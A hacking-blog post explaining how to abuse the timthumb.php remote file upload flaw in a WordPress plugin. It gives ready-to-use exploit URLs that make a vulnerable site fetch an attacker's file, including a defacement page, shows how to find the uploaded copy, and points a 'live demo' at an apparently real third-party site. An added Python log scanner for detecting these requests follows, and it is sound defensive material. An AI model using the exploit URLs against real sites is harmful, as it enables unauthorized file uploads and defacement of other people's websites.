WordPress timthumb remote file upload vulnerability -- Website Hacking
With this vulnerability you can include any file (every format allowed) on a vulnerable WordPress website.
This bug is known as the "timthumb.php" exploit.
Exploit: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
Example: http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
After accessing this URL, the file is uploaded remotely to the website.
To view your uploaded file, go to:
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(The file is uploaded with a random name like fe0555b78d04cb3c76cff7e10cf05b77; check the last file to view your file.)
Live demo: http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result: http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html
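For site owners, the two requests described above leave a recognizable trace in the web server access log. The following is an added example (not part of the original post) that flags them; the hostname in SITE_HOSTS, the log lines and the Apache combined log format are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOSTS = {"blog.example"}            # assumption: the site's own hostnames
IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Apr/2012:10:01:02 +0000] "GET /wp-content/plugins/highlighter/libs/timthumb.php?src=http://files.example.net/page.html HTTP/1.1" 200 512 "-" "curl/7.21"
198.51.100.7 - - [10/Apr/2012:10:01:09 +0000] "GET /wp-content/plugins/highlighter/libs/temp/0123456789abcdef0123456789abcdef.html HTTP/1.1" 200 512 "-" "curl/7.21"
203.0.113.5 - - [10/Apr/2012:10:02:00 +0000] "GET /wp-content/plugins/highlighter/libs/timthumb.php?src=/wp-content/uploads/a.jpg&w=100 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Apr/2012:10:02:30 +0000] "GET /wp-content/plugins/highlighter/libs/timthumb.php?src=http://blog.example/wp-content/uploads/b.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CACHED = re.compile(r"/temp/[0-9a-f]{32}(?:\.(\w+))?$", re.I)

def classify(line):
    """Return (client_ip, finding) for a suspicious log line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    ip, target = m.groups()
    url = urlsplit(target)
    # 1) timthumb.php asked to fetch from a host that is not this site.
    if url.path.lower().endswith("/timthumb.php"):
        for src in parse_qs(url.query).get("src", []):
            host = urlsplit(src).hostname
            if host and host.lower() not in SITE_HOSTS:
                return ip, "remote-src:" + host
    # 2) A 32-hex-named file in temp/ served with a non-image extension
    #    (names with no extension are flagged for review as well).
    c = CACHED.search(url.path)
    if c and (c.group(1) or "").lower() not in IMAGE_EXT:
        return ip, "non-image-in-temp:" + url.path.rsplit("/", 1)[1]
    return None

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

A hit of the first kind followed by a hit of the second kind from the same client is the pattern to investigate; the temp directory should then be checked on disk for files that are not images.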
http://www.devilscafe.in/2012/04/wordpress-timthumb-remote-file-include.html